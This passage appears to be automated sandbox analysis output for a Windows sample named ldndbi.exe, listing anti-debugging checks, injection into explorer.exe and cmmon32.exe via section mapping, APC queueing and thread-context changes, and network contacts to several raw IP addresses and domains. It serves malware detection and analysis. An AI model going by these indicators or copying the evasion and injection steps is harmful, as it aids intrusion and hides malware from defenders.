          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ACB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ACB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ACD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00ACFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00ACFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00AE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_00A2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 3_2_0040CF43 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 1_2_004018F8 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 1_2_00401BF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 1_2_00401796 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 198.46.160.97 80
          Source: C:\Windows\explorer.exe | Domain query: www.denko-kosan.com
          Source: C:\Windows\explorer.exe | Domain query: www.traindic.top
          Source: C:\Windows\explorer.exe | Network Connect: 1.13.186.125 80
          Source: C:\Windows\explorer.exe | Network Connect: 219.94.129.181 80
          Source: C:\Windows\explorer.exe | Network Connect: 162.0.231.77 80
          Source: C:\Windows\explorer.exe | Network Connect: 67.222.24.48 80
          Source: C:\Windows\explorer.exe | Network Connect: 49.212.180.95 80
          Source: C:\Windows\explorer.exe | Domain query: www.bohndigitaltech.com
          Source: C:\Windows\explorer.exe | Domain query: www.0dhy.xyz
          Source: C:\Windows\explorer.exe | Domain query: www.yongleproducts.com
          Source: C:\Windows\explorer.exe | Network Connect: 162.241.24.110 80
          Source: C:\Windows\explorer.exe | Domain query: www.rifleroofers.com
          Source: C:\Windows\explorer.exe | Domain query: www.kunimi.org
          Source: C:\Windows\explorer.exe | Domain query: www.amirah.cfd
          Source: C:\Windows\explorer.exe | Domain query: www.bisarropainting.com
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1200000
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\ldndbi.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Thread register set: target process: 3320
          Source: C:\Windows\SysWOW64\cmmon32.exe | Thread register set: target process: 3320
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe C:\Users\user~1\AppData\Local\Temp\ldndbi.exe
          Source: explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
